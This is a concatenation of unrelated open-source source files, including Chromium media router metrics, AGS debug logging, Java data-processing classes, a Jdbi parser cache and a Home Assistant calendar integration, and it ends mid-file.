DCHECK_LT(static_cast<int>(version),
static_cast<int>(MediaRouteProviderVersion::TOTAL_COUNT));
UMA_HISTOGRAM_ENUMERATION(
kHistogramProviderVersion, static_cast<int>(version),
static_cast<int>(MediaRouteProviderVersion::TOTAL_COUNT));
}
// static
void MediaRouterMojoMetrics::RecordMediaRouteProviderWakeup(
MediaRouteProviderWakeup wakeup) {
DCHECK_LT(static_cast<int>(wakeup),
static_cast<int>(MediaRouteProviderWakeup::TOTAL_COUNT));
UMA_HISTOGRAM_ENUMERATION(
kHistogramProviderWakeup, static_cast<int>(wakeup),
static_cast<int>(MediaRouteProviderWakeup::TOTAL_COUNT));
}
// static
void MediaRouterMojoMetrics::RecordCreateRouteResultCode(
MediaRouteProviderId provider_id,
RouteRequestResult::ResultCode result_code) {
DCHECK_LT(result_code, RouteRequestResult::TOTAL_COUNT);
switch (provider_id) {
case MediaRouteProviderId::WIRED_DISPLAY:
UMA_HISTOGRAM_ENUMERATION(kHistogramProviderCreateRouteResultWiredDisplay,
result_code, RouteRequestResult::TOTAL_COUNT);
break;
case MediaRouteProviderId::EXTENSION:
// TODO(crbug.com/809249): Implement Cast-specific metric.
case MediaRouteProviderId::CAST:
// TODO(crbug.com/808720): Implement DIAL-specific metric.
case MediaRouteProviderId::DIAL:
case MediaRouteProviderId::UNKNOWN:
UMA_HISTOGRAM_ENUMERATION(kHistogramProviderCreateRouteResult,
result_code, RouteRequestResult::TOTAL_COUNT);
break;
}
}
// static
void MediaRouterMojoMetrics::RecordJoinRouteResultCode(
MediaRouteProviderId provider_id,
RouteRequestResult::ResultCode result_code) {
DCHECK_LT(result_code, RouteRequestResult::ResultCode::TOTAL_COUNT);
switch (provider_id) {
case MediaRouteProviderId::WIRED_DISPLAY:
UMA_HISTOGRAM_ENUMERATION(kHistogramProviderJoinRouteResultWiredDisplay,
result_code, RouteRequestResult::TOTAL_COUNT);
break;
case MediaRouteProviderId::EXTENSION:
// TODO(crbug.com/809249): Implement Cast-specific metric.
case MediaRouteProviderId::CAST:
// TODO(crbug.com/808720): Implement DIAL-specific metric.
case MediaRouteProviderId::DIAL:
case MediaRouteProviderId::UNKNOWN:
UMA_HISTOGRAM_ENUMERATION(kHistogramProviderJoinRouteResult, result_code,
RouteRequestResult::TOTAL_COUNT);
break;
}
}
// static
void MediaRouterMojoMetrics::RecordMediaRouteProviderTerminateRoute(
MediaRouteProviderId provider_id,
RouteRequestResult::ResultCode result_code) {
DCHECK_LT(result_code, RouteRequestResult::ResultCode::TOTAL_COUNT);
switch (provider_id) {
case MediaRouteProviderId::WIRED_DISPLAY:
UMA_HISTOGRAM_ENUMERATION(
kHistogramProviderTerminateRouteResultWiredDisplay, result_code,
RouteRequestResult::TOTAL_COUNT);
break;
case MediaRouteProviderId::EXTENSION:
// TODO(crbug.com/809249): Implement Cast-specific metric.
case MediaRouteProviderId::CAST:
// TODO(crbug.com/808720): Implement DIAL-specific metric.
case MediaRouteProviderId::DIAL:
case MediaRouteProviderId::UNKNOWN:
UMA_HISTOGRAM_ENUMERATION(kHistogramProviderTerminateRouteResult,
result_code, RouteRequestResult::TOTAL_COUNT);
break;
}
}
// static
void MediaRouterMojoMetrics::RecordMediaRouteControllerCreationResult(
bool success) {
UMA_HISTOGRAM_BOOLEAN(kHistogramProviderRouteControllerCreationOutcome,
success);
}
// static
MediaRouteProviderVersion MediaRouterMojoMetrics::GetMediaRouteProviderVersion(
const base::Version& extension_version,
const base::Version& browser_version) {
if (!extension_version.IsValid() || extension_version.components().empty() ||
!browser_version.IsValid() || browser_version.components().empty()) {
return MediaRouteProviderVersion::UNKNOWN;
}
uint32_t extension_major = extension_version.components()[0];
uint32_t browser_major = browser_version.components()[0];
// Sanity check.
if (extension_major == 0 || browser_major == 0) {
return MediaRouteProviderVersion::UNKNOWN;
} else if (extension_major >= browser_major) {
return MediaRouteProviderVersion::SAME_VERSION_AS_CHROME;
} else if (browser_major - extension_major == 1) {
return MediaRouteProviderVersion::ONE_VERSION_BEHIND_CHROME;
} else {
return MediaRouteProviderVersion::MULTIPLE_VERSIONS_BEHIND_CHROME;
}
}
} // namespace media_router
| 2,603
|
450
|
//=============================================================================
//
// Adventure Game Studio (AGS)
//
// Copyright (C) 1999-2011 <NAME> and 2011-20xx others
// The full list of copyright holders can be found in the Copyright.txt
// file, which is part of this source code distribution.
//
// The AGS source code is provided under the Artistic License 2.0.
// A copy of this license can be found in the file License.txt and at
// http://www.opensource.org/licenses/artistic-license-2.0.php
//
//=============================================================================
#include <stdarg.h>
#include "debug/debugmanager.h"
#include "util/string_types.h"
namespace AGS
{
namespace Common
{
DebugOutput::DebugOutput(const String &id, IOutputHandler *handler, MessageType def_verbosity, bool enabled)
: _id(id)
, _handler(handler)
, _enabled(enabled)
, _defaultVerbosity(def_verbosity)
{
_groupFilter.resize(DbgMgr._lastGroupID + 1, _defaultVerbosity);
}
String DebugOutput::GetID() const
{
return _id;
}
IOutputHandler *DebugOutput::GetHandler() const
{
return _handler;
}
bool DebugOutput::IsEnabled() const
{
return _enabled;
}
void DebugOutput::SetEnabled(bool enable)
{
_enabled = enable;
}
void DebugOutput::SetGroupFilter(DebugGroupID id, MessageType verbosity)
{
uint32_t key = DbgMgr.GetGroup(id).UID.ID;
if (key != kDbgGroup_None)
_groupFilter[key] = verbosity;
else
_unresolvedGroups.insert(std::make_pair(id.SID, verbosity));
}
void DebugOutput::SetAllGroupFilters(MessageType verbosity)
{
for (auto &group : _groupFilter)
group = verbosity;
for (auto &group : _unresolvedGroups)
group.second = verbosity;
}
void DebugOutput::ClearGroupFilters()
{
for (auto &gf : _groupFilter)
gf = kDbgMsg_None;
_unresolvedGroups.clear();
}
void DebugOutput::ResolveGroupID(DebugGroupID id)
{
if (!id.IsValid())
return;
DebugGroupID real_id = DbgMgr.GetGroup(id).UID;
if (real_id.IsValid())
{
if (_groupFilter.size() <= id.ID)
_groupFilter.resize(id.ID + 1, _defaultVerbosity);
GroupNameToMTMap::const_iterator it = _unresolvedGroups.find(real_id.SID);
if (it != _unresolvedGroups.end())
{
_groupFilter[real_id.ID] = it->second;
_unresolvedGroups.erase(it);
}
}
}
bool DebugOutput::TestGroup(DebugGroupID id, MessageType mt) const
{
DebugGroupID real_id = DbgMgr.GetGroup(id).UID;
if (real_id.ID == kDbgGroup_None || real_id.ID >= _groupFilter.size())
return false;
return (_groupFilter[real_id.ID] >= mt) != 0;
}
DebugManager::DebugManager()
{
// Add hardcoded groups
RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Main, "main"), ""));
RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Game, "game"), "Game"));
RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_Script, "script"), "Script"));
RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_SprCache, "sprcache"), "Sprite cache"));
RegisterGroup(DebugGroup(DebugGroupID(kDbgGroup_ManObj, "manobj"), "Managed obj"));
_firstFreeGroupID = _groups.size();
_lastGroupID = _firstFreeGroupID;
}
DebugGroup DebugManager::GetGroup(DebugGroupID id)
{
if (id.ID != kDbgGroup_None)
{
return id.ID < _groups.size() ? _groups[id.ID] : DebugGroup();
}
else if (!id.SID.IsEmpty())
{
GroupByStringMap::const_iterator it = _groupByStrLookup.find(id.SID);
return it != _groupByStrLookup.end() ? _groups[it->second.ID] : DebugGroup();
}
return DebugGroup();
}
PDebugOutput DebugManager::GetOutput(const String &id)
{
OutMap::const_iterator it = _outputs.find(id);
return it != _outputs.end() ? it->second.Target : PDebugOutput();
}
DebugGroup DebugManager::RegisterGroup(const String &id, const String &out_name)
{
DebugGroup group = GetGroup(id);
if (group.UID.IsValid())
return group;
group = DebugGroup(DebugGroupID(++DbgMgr._lastGroupID, id), out_name);
_groups.push_back(group);
_groupByStrLookup[group.UID.SID] = group.UID;
// Resolve group reference on every output target
for (OutMap::const_iterator it = _outputs.begin(); it != _outputs.end(); ++it)
{
it->second.Target->ResolveGroupID(group.UID);
}
return group;
}
void DebugManager::RegisterGroup(const DebugGroup &group)
{
if (_groups.size() <= group.UID.ID)
_groups.resize(group.UID.ID + 1);
_groups[group.UID.ID] = group;
_groupByStrLookup[group.UID.SID] = group.UID;
}
PDebugOutput DebugManager::RegisterOutput(const String &id, IOutputHandler *handler, MessageType def_verbosity, bool enabled)
{
_outputs[id].Target = PDebugOutput(new DebugOutput(id, handler, def_verbosity, enabled));
_outputs[id].Suppressed = false;
return _outputs[id].Target;
}
void DebugManager::UnregisterAll()
{
_lastGroupID = _firstFreeGroupID;
_groups.clear();
_groupByStrLookup.clear();
_outputs.clear();
}
void DebugManager::UnregisterGroup(DebugGroupID id)
{
DebugGroup group = GetGroup(id);
if (!group.UID.IsValid())
return;
_groups[group.UID.ID] = DebugGroup();
_groupByStrLookup.erase(group.UID.SID);
}
void DebugManager::UnregisterOutput(const String &id)
{
_outputs.erase(id);
}
void DebugManager::Print(DebugGroupID group_id, MessageType mt, const String &text)
{
const DebugGroup &group = GetGroup(group_id);
DebugMessage msg(text, group.UID.ID, group.OutputName, mt);
for (OutMap::iterator it = _outputs.begin(); it != _outputs.end(); ++it)
{
SendMessage(it->second, msg);
}
}
void DebugManager::SendMessage(const String &out_id, const DebugMessage &msg)
{
OutMap::iterator it = _outputs.find(out_id);
if (it != _outputs.end())
SendMessage(it->second, msg);
}
void DebugManager::SendMessage(OutputSlot &out, const DebugMessage &msg)
{
IOutputHandler *handler = out.Target->GetHandler();
if (!handler || !out.Target->IsEnabled() || out.Suppressed)
return;
if (!out.Target->TestGroup(msg.GroupID, msg.MT))
return;
// We suppress current target before the call so that if it makes
// a call to output system itself, message would not print to the
// same target
out.Suppressed = true;
handler->PrintMessage(msg);
out.Suppressed = false;
}
// TODO: move this to the dynamically allocated engine object whenever it is implemented
DebugManager DbgMgr;
namespace Debug
{
void Printf(const String &text)
{
DbgMgr.Print(kDbgGroup_Main, kDbgMsg_Default, text);
}
void Printf(MessageType mt, const String &text)
{
DbgMgr.Print(kDbgGroup_Main, mt, text);
}
void Printf(DebugGroupID group, MessageType mt, const String &text)
{
DbgMgr.Print(group, mt, text);
}
void Printf(const char *fmt, ...)
{
va_list argptr;
va_start(argptr, fmt);
DbgMgr.Print(kDbgGroup_Main, kDbgMsg_Default, String::FromFormatV(fmt, argptr));
va_end(argptr);
}
void Printf(MessageType mt, const char *fmt, ...)
{
va_list argptr;
va_start(argptr, fmt);
DbgMgr.Print(kDbgGroup_Main, mt, String::FromFormatV(fmt, argptr));
va_end(argptr);
}
void Printf(DebugGroupID group, MessageType mt, const char *fmt, ...)
{
va_list argptr;
va_start(argptr, fmt);
DbgMgr.Print(group, mt, String::FromFormatV(fmt, argptr));
va_end(argptr);
}
} // namespace Debug
} // namespace Common
} // namespace AGS
| 2,868
|
552
|
<reponame>WinsomLow/CPP-3D-Game-Tutorial-Series
#include "Resource.h"
Resource::Resource(const wchar_t* full_path): m_full_path(full_path)
{
}
Resource::~Resource()
{
}
| 73
|
435
|
<filename>warehouse/query-core/src/main/java/datawave/query/tld/TLDTermFrequencyAggregator.java<gh_stars>100-1000
package datawave.query.tld;
import datawave.query.jexl.functions.TermFrequencyAggregator;
import datawave.query.predicate.EventDataQueryFilter;
import org.apache.accumulo.core.data.ByteSequence;
import java.util.ArrayList;
import java.util.Set;
/**
* TermFrequencyAggregator which will treat all TF uid's as the TLD uid for the purposes of aggregation
*/
public class TLDTermFrequencyAggregator extends TermFrequencyAggregator {
public TLDTermFrequencyAggregator(Set<String> fieldsToKeep, EventDataQueryFilter attrFilter, int maxNextCount) {
super(fieldsToKeep, attrFilter, maxNextCount);
}
@Override
protected ByteSequence parsePointer(ByteSequence qualifier) {
ArrayList<Integer> deezNulls = TLD.instancesOf(0, qualifier, -1);
final int stop = deezNulls.get(1);
final int uidStart = deezNulls.get(0);
ByteSequence uid = qualifier.subSequence(uidStart + 1, stop);
ArrayList<Integer> deezDots = TLD.instancesOf('.', uid);
if (deezDots.size() > 2) {
return qualifier.subSequence(0, uidStart + deezDots.get(2) + 1);
} else {
return qualifier.subSequence(0, stop);
}
}
}
| 519
|
424
|
import torch.nn as nn
PADDING_LAYERS = {
'zero': nn.ZeroPad2d,
'reflect': nn.ReflectionPad2d,
'replicate': nn.ReplicationPad2d
}
def build_padding_layer(cfg, *args, **kwargs):
"""Build padding layer.
Args:
cfg (None or dict): The padding layer config, which should contain:
- type (str): Layer type.
- layer args: Args needed to instantiate a padding layer.
Returns:
nn.Module: Created padding layer.
"""
if not isinstance(cfg, dict):
raise TypeError('cfg must be a dict')
if 'typename' not in cfg:
raise KeyError('the cfg dict must contain the key "typename"')
cfg_ = cfg.copy()
padding_type = cfg_.pop('typename')
if padding_type not in PADDING_LAYERS:
raise KeyError(f'Unrecognized padding type {padding_type}.')
else:
padding_layer = PADDING_LAYERS.get(padding_type)
layer = padding_layer(*args, **kwargs, **cfg_)
return layer
| 404
|
700
|
#include <CommonCrypto/CommonDigestSPI.h>
#define kNone "none"
extern const int kSHA256NullTerminatedBuffLen;
#define MD5File(f, b) Digest_File(kCCDigestMD5, f, b)
#define SHA1_File(f, b) Digest_File(kCCDigestSHA1, f, b)
#define RIPEMD160_File(f, b) Digest_File(kCCDigestRMD160, f, b)
#define SHA256_File(f, b) Digest_File(kCCDigestSHA256, f, b)
char *Digest_File(CCDigestAlg algorithm, const char *filename, char *buf);
char *SHA256_Path_XATTRs(char *path, char *buf);
char *SHA256_Path_ACL(char *path, char *buf);
| 231
|
44,968
|
{
"name": "test_run_custom_script",
"version": "1.0.0",
"license": "UNLICENSED",
"scripts": {
"custom-script": "node echo.js"
}
}
| 66
|
1,396
|
<reponame>drunderscore/jdbi
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jdbi.v3.core.statement;
import com.github.benmanes.caffeine.cache.Caffeine;
import com.github.benmanes.caffeine.cache.LoadingCache;
import com.github.benmanes.caffeine.cache.stats.CacheStats;
import org.jdbi.v3.meta.Beta;
abstract class CachingSqlParser implements SqlParser {
private final LoadingCache<String, ParsedSql> parsedSqlCache;
CachingSqlParser() {
this(Caffeine.newBuilder()
.maximumSize(1_000));
}
CachingSqlParser(Caffeine<Object, Object> cache) {
parsedSqlCache = cache.build(this::internalParse);
}
@Override
public ParsedSql parse(String sql, StatementContext ctx) {
try {
return parsedSqlCache.get(sql);
} catch (IllegalArgumentException e) {
throw new UnableToCreateStatementException("Exception parsing for named parameter replacement", e, ctx);
}
}
@Beta
public CacheStats cacheStats() {
return parsedSqlCache.stats();
}
abstract ParsedSql internalParse(String sql);
}
| 572
|
375
|
package io.lumify.core.ingest.graphProperty;
import com.google.inject.Inject;
import io.lumify.core.bootstrap.InjectHelper;
import io.lumify.core.config.Configuration;
import io.lumify.core.exception.LumifyException;
import io.lumify.core.ingest.WorkerSpout;
import io.lumify.core.model.properties.LumifyProperties;
import io.lumify.core.model.user.UserRepository;
import io.lumify.core.model.workQueue.WorkQueueRepository;
import io.lumify.core.security.VisibilityTranslator;
import io.lumify.core.user.User;
import io.lumify.core.util.LumifyLogger;
import io.lumify.core.util.LumifyLoggerFactory;
import io.lumify.core.util.ServiceLoaderUtil;
import io.lumify.core.util.TeeInputStream;
import org.apache.commons.io.IOUtils;
import org.apache.hadoop.fs.FileSystem;
import org.json.JSONObject;
import org.securegraph.*;
import org.securegraph.property.StreamingPropertyValue;
import org.securegraph.util.IterableUtils;
import java.io.*;
import java.net.URI;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import java.util.Set;
import static org.securegraph.util.IterableUtils.toList;
public class GraphPropertyRunner {
private static final LumifyLogger LOGGER = LumifyLoggerFactory.getLogger(GraphPropertyRunner.class);
private Graph graph;
private Authorizations authorizations;
private List<GraphPropertyThreadedWrapper> workerWrappers;
private User user;
private UserRepository userRepository;
private Configuration configuration;
private WorkQueueRepository workQueueRepository;
private VisibilityTranslator visibilityTranslator;
private boolean shouldRun;
public void prepare(User user) {
this.user = user;
this.authorizations = this.userRepository.getAuthorizations(this.user);
prepareWorkers();
}
private void prepareWorkers() {
FileSystem hdfsFileSystem = getFileSystem();
List<TermMentionFilter> termMentionFilters = loadTermMentionFilters(hdfsFileSystem);
GraphPropertyWorkerPrepareData workerPrepareData = new GraphPropertyWorkerPrepareData(
configuration.toMap(),
termMentionFilters,
hdfsFileSystem,
this.user,
this.authorizations,
InjectHelper.getInjector());
Collection<GraphPropertyWorker> workers = InjectHelper.getInjectedServices(GraphPropertyWorker.class, configuration);
this.workerWrappers = new ArrayList<>(workers.size());
boolean failedToPrepareAtLeastOneGraphPropertyWorker = false;
for (GraphPropertyWorker worker : workers) {
try {
LOGGER.debug("preparing: %s", worker.getClass().getName());
worker.prepare(workerPrepareData);
} catch (Exception ex) {
LOGGER.error("Could not prepare graph property worker %s", worker.getClass().getName(), ex);
failedToPrepareAtLeastOneGraphPropertyWorker = true;
}
GraphPropertyThreadedWrapper wrapper = new GraphPropertyThreadedWrapper(worker);
InjectHelper.inject(wrapper);
workerWrappers.add(wrapper);
Thread thread = new Thread(wrapper);
String workerName = worker.getClass().getName();
thread.setName("graphPropertyWorker-" + workerName);
thread.start();
}
if (failedToPrepareAtLeastOneGraphPropertyWorker) {
throw new LumifyException("Failed to initialize at least one graph property worker. See the log for more details.");
}
}
private FileSystem getFileSystem() {
FileSystem hdfsFileSystem;
org.apache.hadoop.conf.Configuration conf = configuration.toHadoopConfiguration();
try {
String hdfsRootDir = configuration.get(Configuration.HADOOP_URL, null);
hdfsFileSystem = FileSystem.get(new URI(hdfsRootDir), conf, "hadoop");
} catch (Exception e) {
throw new LumifyException("Could not open hdfs filesystem", e);
}
return hdfsFileSystem;
}
private List<TermMentionFilter> loadTermMentionFilters(FileSystem hdfsFileSystem) {
TermMentionFilterPrepareData termMentionFilterPrepareData = new TermMentionFilterPrepareData(
configuration.toMap(),
hdfsFileSystem,
this.user,
this.authorizations,
InjectHelper.getInjector()
);
List<TermMentionFilter> termMentionFilters = toList(ServiceLoaderUtil.load(TermMentionFilter.class, configuration));
for (TermMentionFilter termMentionFilter : termMentionFilters) {
InjectHelper.inject(termMentionFilter);
try {
termMentionFilter.prepare(termMentionFilterPrepareData);
} catch (Exception ex) {
throw new LumifyException("Could not initialize term mention filter: " + termMentionFilter.getClass().getName(), ex);
}
}
return termMentionFilters;
}
public void process(JSONObject json) throws Exception {
String propertyKey = json.optString("propertyKey");
String propertyName = json.optString("propertyName");
String workspaceId = json.optString("workspaceId");
String visibilitySource = json.optString("visibilitySource");
String graphVertexId = json.optString("graphVertexId");
if (graphVertexId != null && graphVertexId.length() > 0) {
Vertex vertex = graph.getVertex(graphVertexId, this.authorizations);
if (vertex == null) {
throw new LumifyException("Could not find vertex with id " + graphVertexId);
}
safeExecute(vertex, propertyKey, propertyName, workspaceId, visibilitySource);
return;
}
String graphEdgeId = json.optString("graphEdgeId");
if (graphEdgeId != null && graphEdgeId.length() > 0) {
Edge edge = graph.getEdge(graphEdgeId, this.authorizations);
if (edge == null) {
throw new LumifyException("Could not find edge with id " + graphEdgeId);
}
safeExecute(edge, propertyKey, propertyName, workspaceId, visibilitySource);
return;
}
throw new LumifyException("Could not find graphVertexId or graphEdgeId");
}
private void safeExecute(Element element, String propertyKey, String propertyName, String workspaceId, String visibilitySource) throws Exception {
Property property;
if ((propertyKey == null || propertyKey.length() == 0) && (propertyName == null || propertyName.length() == 0)) {
property = null;
} else {
if (propertyKey == null) {
property = element.getProperty(propertyName);
} else {
property = element.getProperty(propertyKey, propertyName);
}
if (property == null) {
LOGGER.error("Could not find property [%s]:[%s] on vertex with id %s", propertyKey, propertyName, element.getId());
return;
}
}
safeExecute(element, property, workspaceId, visibilitySource);
}
private void safeExecute(Element element, Property property, String workspaceId, String visibilitySource) throws Exception {
String propertyText = property == null ? "[none]" : (property.getKey() + ":" + property.getName());
List<GraphPropertyThreadedWrapper> interestedWorkerWrappers = findInterestedWorkers(element, property);
if (interestedWorkerWrappers.size() == 0) {
LOGGER.info("Could not find interested workers for element %s property %s", element.getId(), propertyText);
return;
}
if (LOGGER.isDebugEnabled()) {
for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
LOGGER.debug("interested worker for element %s property %s: %s", element.getId(), propertyText, interestedWorkerWrapper.getWorker().getClass().getName());
}
}
GraphPropertyWorkData workData = new GraphPropertyWorkData(visibilityTranslator, element, property, workspaceId, visibilitySource);
LOGGER.debug("Begin work on element %s property %s", element.getId(), propertyText);
if (property != null && property.getValue() instanceof StreamingPropertyValue) {
StreamingPropertyValue spb = (StreamingPropertyValue) property.getValue();
safeExecuteStreamingPropertyValue(interestedWorkerWrappers, workData, spb);
} else {
safeExecuteNonStreamingProperty(interestedWorkerWrappers, workData);
}
this.graph.flush();
LOGGER.debug("Completed work on %s", propertyText);
}
private void safeExecuteNonStreamingProperty(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers, GraphPropertyWorkData workData) throws Exception {
for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
interestedWorkerWrapper.getWorker().execute(null, workData);
}
}
private void safeExecuteStreamingPropertyValue(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers, GraphPropertyWorkData workData, StreamingPropertyValue streamingPropertyValue) throws Exception {
String[] workerNames = graphPropertyThreadedWrapperToNames(interestedWorkerWrappers);
InputStream in = streamingPropertyValue.getInputStream();
File tempFile = null;
try {
boolean requiresLocalFile = isLocalFileRequired(interestedWorkerWrappers);
if (requiresLocalFile) {
tempFile = copyToTempFile(in, workData);
in = new FileInputStream(tempFile);
}
TeeInputStream teeInputStream = new TeeInputStream(in, workerNames);
for (int i = 0; i < interestedWorkerWrappers.size(); i++) {
interestedWorkerWrappers.get(i).enqueueWork(teeInputStream.getTees()[i], workData);
}
teeInputStream.loopUntilTeesAreClosed();
for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
interestedWorkerWrapper.dequeueResult();
}
} finally {
if (tempFile != null) {
if (!tempFile.delete()) {
LOGGER.warn("Could not delete temp file %s", tempFile.getAbsolutePath());
}
}
}
}
private File copyToTempFile(InputStream in, GraphPropertyWorkData workData) throws IOException {
String fileExt = LumifyProperties.FILE_NAME_EXTENSION.getPropertyValue(workData.getElement());
if (fileExt == null) {
fileExt = "data";
}
File tempFile = File.createTempFile("graphPropertyBolt", fileExt);
workData.setLocalFile(tempFile);
try (OutputStream tempFileOut = new FileOutputStream(tempFile)) {
IOUtils.copy(in, tempFileOut);
} finally {
in.close();
}
return tempFile;
}
private boolean isLocalFileRequired(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers) {
for (GraphPropertyThreadedWrapper worker : interestedWorkerWrappers) {
if (worker.getWorker().isLocalFileRequired()) {
return true;
}
}
return false;
}
private List<GraphPropertyThreadedWrapper> findInterestedWorkers(Element element, Property property) {
Set<String> graphPropertyWorkerWhiteList = IterableUtils.toSet(LumifyProperties.GRAPH_PROPERTY_WORKER_WHITE_LIST.getPropertyValues(element));
Set<String> graphPropertyWorkerBlackList = IterableUtils.toSet(LumifyProperties.GRAPH_PROPERTY_WORKER_BLACK_LIST.getPropertyValues(element));
List<GraphPropertyThreadedWrapper> interestedWorkers = new ArrayList<>();
for (GraphPropertyThreadedWrapper wrapper : workerWrappers) {
String graphPropertyWorkerName = wrapper.getWorker().getClass().getName();
if (graphPropertyWorkerWhiteList.size() > 0 && !graphPropertyWorkerWhiteList.contains(graphPropertyWorkerName)) {
continue;
}
if (graphPropertyWorkerBlackList.contains(graphPropertyWorkerName)) {
continue;
}
if (wrapper.getWorker().isHandled(element, property)) {
interestedWorkers.add(wrapper);
}
}
return interestedWorkers;
}
private String[] graphPropertyThreadedWrapperToNames(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers) {
String[] names = new String[interestedWorkerWrappers.size()];
for (int i = 0; i < names.length; i++) {
names[i] = interestedWorkerWrappers.get(i).getWorker().getClass().getName();
}
return names;
}
public void shutdown() {
for (GraphPropertyThreadedWrapper wrapper : this.workerWrappers) {
wrapper.stop();
}
}
@Inject
public void setUserRepository(UserRepository userRepository) {
this.userRepository = userRepository;
}
@Inject
public void setGraph(Graph graph) {
this.graph = graph;
}
@Inject
public void setConfiguration(Configuration configuration) {
this.configuration = configuration;
}
@Inject
public void setWorkQueueRepository(WorkQueueRepository workQueueRepository) {
this.workQueueRepository = workQueueRepository;
}
@Inject
public void setVisibilityTranslator(VisibilityTranslator visibilityTranslator) {
this.visibilityTranslator = visibilityTranslator;
}
public void run() throws Exception {
WorkerSpout workerSpout = prepareGraphPropertyWorkerSpout();
shouldRun = true;
while (shouldRun) {
GraphPropertyWorkerTuple tuple = (GraphPropertyWorkerTuple) workerSpout.nextTuple();
if (tuple == null) {
Thread.sleep(100);
continue;
}
try {
process(tuple.getJson());
workerSpout.ack(tuple.getMessageId());
} catch (Throwable ex) {
LOGGER.error("Could not process tuple: %s", tuple, ex);
workerSpout.fail(tuple.getMessageId());
}
}
}
public void stop() {
shouldRun = false;
}
protected WorkerSpout prepareGraphPropertyWorkerSpout() {
WorkerSpout spout = workQueueRepository.createWorkerSpout();
spout.open();
return spout;
}
}
| 5,833
|
387
|
<reponame>Jaikishan-Saroj-786/jpf-core<gh_stars>100-1000
/*
* Copyright (C) 2014, United States Government, as represented by the
* Administrator of the National Aeronautics and Space Administration.
* All rights reserved.
*
* The Java Pathfinder core (jpf-core) platform is licensed under the
* Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package gov.nasa.jpf.test.vm.basic;
import gov.nasa.jpf.util.test.TestJPF;
import gov.nasa.jpf.vm.ClassInfo;
import gov.nasa.jpf.vm.ClassLoaderInfo;
import org.junit.Test;
/*
* VM.registerStartupClass must be kept in sync with ClassInfo.registerClass.
* This test ensures that the interfaces of the main class are registered
* properly. The old VM.registerStartupClass code wasn't initializing the
* class object of the interfaces.
*/
public class InitializeInterfaceClassObjectRefTest extends TestJPF implements InitializeInterfaceClassObjectRefTestInterface
{
@Test
public void test()
{
if (verifyUnhandledExceptionDetails(RuntimeException.class.getName(), "This test throws an expected exception.", "+log.finest+=,gov.nasa.jpf.vm.ClassInfo"))
{
// Throw an exception to avoid backtracking. Backtracking will wipe out the class object ref.
throw new RuntimeException("This test throws an expected exception.");
}
else
{
ClassInfo ci = ClassLoaderInfo.getCurrentResolvedClassInfo( InitializeInterfaceClassObjectRefTestInterface.class.getName());
if (ci.getClassObjectRef() < 0)
throw new AssertionError("ci.getClassObjectRef() < 0 : " + ci.getClassObjectRef());
}
}
}
interface InitializeInterfaceClassObjectRefTestInterface
{
}
| 686
|
30,023
|
<reponame>liangleslie/core
"""Support for Vulcan Calendar platform."""
from __future__ import annotations
from datetime import date, datetime, timedelta
import logging
from aiohttp import ClientConnectorError
from vulcan import UnauthorizedCertificateException
from homeassistant.components.calendar import (
ENTITY_ID_FORMAT,
CalendarEntity,
CalendarEvent,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import DOMAIN
from .fetch_data import get_lessons, get_student_info
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the calendar platform for entity."""
client = hass.data[DOMAIN][config_entry.entry_id]
data = {
"student_info": await get_student_info(
client, config_entry.data.get("student_id")
),
}
async_add_entities(
[
VulcanCalendarEntity(
client,
data,
generate_entity_id(
ENTITY_ID_FORMAT,
f"vulcan_calendar_{data['student_info']['full_name']}",
hass=hass,
),
)
],
)
class VulcanCalendarEntity(CalendarEntity):
"""A calendar entity."""
def __init__(self, client, data, entity_id) -> None:
"""Create the Calendar entity."""
self.student_info = data["student_info"]
self._event: CalendarEvent | None = None
self.client = client
self.entity_id = entity_id
self._unique_id = f"vulcan_calendar_{self.student_info['id']}"
self._attr_name = f"Vulcan calendar - {self.student_info['full_name']}"
self._attr_unique_id = f"vulcan_calendar_{self.student_info['id']}"
self._attr_device_info = {
"identifiers": {(DOMAIN, f"calendar_{self.student_info['id']}")},
"entry_type": DeviceEntryType.SERVICE,
"name": f"{self.student_info['full_name']}: Calendar",
"model": f"{self.student_info['full_name']} - {self.student_info['class']} {self.student_info['school']}",
"manufacturer": "Uonet +",
"configuration_url": f"https://uonetplus.vulcan.net.pl/{self.student_info['symbol']}",
}
@property
def event(self) -> CalendarEvent | None:
"""Return the next upcoming event."""
return self._event
async def async_get_events(self, hass, start_date, end_date) -> list[CalendarEvent]:
"""Get all events in a specific time frame."""
try:
events = await get_lessons(
self.client,
date_from=start_date,
date_to=end_date,
)
except UnauthorizedCertificateException as err:
raise ConfigEntryAuthFailed(
"The certificate is not authorized, please authorize integration again"
) from err
except ClientConnectorError as err:
if self.available:
_LOGGER.warning(
"Connection error - please check your internet connection: %s", err
)
events = []
event_list = []
for item in events:
event = CalendarEvent(
